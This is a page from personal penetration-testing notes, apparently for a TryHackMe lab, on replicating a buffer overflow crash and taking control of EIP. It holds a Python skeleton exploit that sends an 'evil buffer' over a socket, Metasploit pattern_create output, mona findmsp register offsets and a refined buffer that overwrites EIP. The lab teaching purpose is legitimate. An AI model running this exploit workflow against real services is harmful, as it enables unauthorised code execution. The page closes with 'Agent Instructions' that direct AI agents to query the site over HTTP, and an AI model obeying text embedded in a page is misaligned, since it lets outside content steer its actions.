# 5. Crash Replication & Controlling EIP The following skeleton exploit code can be used for the rest of the buffer overflow exploit, add `send` and `recv` commands like you did in fuzzing: ```python import socket ip = "10.0.0.1" port = 21 prefix = "" offset = 0 overflow = "A" * offset retn = "" padding = "" payload = "" postfix = "" buffer = prefix + overflow + retn + padding + payload + postfix s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip, port)) print("Sending evil buffer...") s.send(buffer + "\r\n") print("Done!") except: print("Could not connect.") ``` Using the buffer length which caused the crash, generate a unique buffer so we can determine the offset in the pattern which overwrites the EIP register, and the offset in the pattern to which other registers point. Create a pattern that is 400 bytes larger than the crash buffer, so that we can determine whether our shellcode can fit immediately. If the larger buffer doesn't crash the application, use a pattern equal to the crash buffer length and slowly add more to the buffer to find space. ```bash $ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag ``` While the unique buffer is on the stack, use mona's findmsp command, with the distance argument set to the pattern length. ``` !mona findmsp -distance 600 ... [+] Looking for cyclic pattern in memory Cyclic pattern (normal) found at 0x005f3614 (length 600 bytes) Cyclic pattern (normal) found at 0x005f4a40 (length 600 bytes) Cyclic pattern (normal) found at 0x017df764 (length 600 bytes) EIP contains normal pattern : 0x78413778 (offset 112) ESP (0x017dfa30) points at offset 116 in normal pattern (length 484) EAX (0x017df764) points at offset 0 in normal pattern (length 600) EBP contains normal pattern : 0x41367841 (offset 108) ... ``` Note the EIP offset (112) and any other registers that point to the pattern, noting their offsets as well. It seems like the ESP register points to the last 484 bytes of the pattern, which is enough space for our shellcode. Create a new buffer using this information to ensure that we can control EIP: ```python prefix = "" offset = 112 overflow = "A" * offset retn = "BBBB" padding = "" payload = "C" * (600-112-4) postfix = "" buffer = prefix + overflow + retn + padding + payload + postfix ``` Crash the application using this buffer, and make sure that EIP is overwritten by B's (\x42) and that the ESP register points to the start of the C's (\x43). --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.nomanaziz.me/cybersecurity/penetration-testing/tryhackme/main-methodology/3.-gaining-access-exploitation/buffer-overflow/5.-crash-replication-and-controlling-eip.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.